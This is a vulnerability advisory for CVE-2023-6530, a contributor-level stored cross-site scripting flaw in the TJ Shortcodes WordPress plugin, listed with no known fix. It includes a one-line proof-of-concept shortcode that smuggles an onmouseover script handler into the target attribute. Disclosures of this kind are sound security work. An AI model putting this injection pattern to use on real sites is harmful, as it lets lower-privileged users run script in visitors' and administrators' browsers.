TJ Shortcodes <= 0.1.3 – Contributor+ Stored XSS via Shortcodes | CVE 2023-6530

Description

The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.

Proof of Concept

[junkie-button url="http://example.com" style="grey" size="small" type="round" target='" onmouseover="alert(/XSS/)"'] Button Text[/junkie-button]

Affects Plugins

theme-junkie-shortcodes

No known fix

References

CVE

CVE-2023-6530

URL

https://research.cleantalk.org/cve-2023-6530-tj-shortcodes-stored-xss-poc/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

Miscellaneous

Original Researcher

Dmitrii Ignatyev

Submitter

Dmitrii Ignatyev

Submitter website

https://research.cleantalk.org

Verified

Yes

WPVDB ID

8e63bf7c-7827-4c4d-b0e3-66354b218bee

Timeline

Publicly Published

2024-01-03 (about 4 months ago)

Added

2024-01-03 (about 4 months ago)

Last Updated

2024-01-04 (about 4 months ago)

Other

Published

Title

Published

2019-03-04

Title

The Events Calendar < 4.8.2 - XSS

Published

2014-08-01

Title

GroupDocs Document Annotation 1.3.8 - grpdocs-dialog.php Multiple Parameter XSS

Published

2021-07-05

Title

Calendar Event Multi View < 1.4.01 - Unauthenticated Reflected Cross-Site Scripting (XSS)

Published

2024-02-05

Title

Blocksy < 2.0.20 - Authenticated (Editor+) Stored Cross-Site Scripting

Published

2023-03-20

Title

Kanban Boards for WordPress <= 2.5.20 - Admin+ Stored Cross-Site Scripting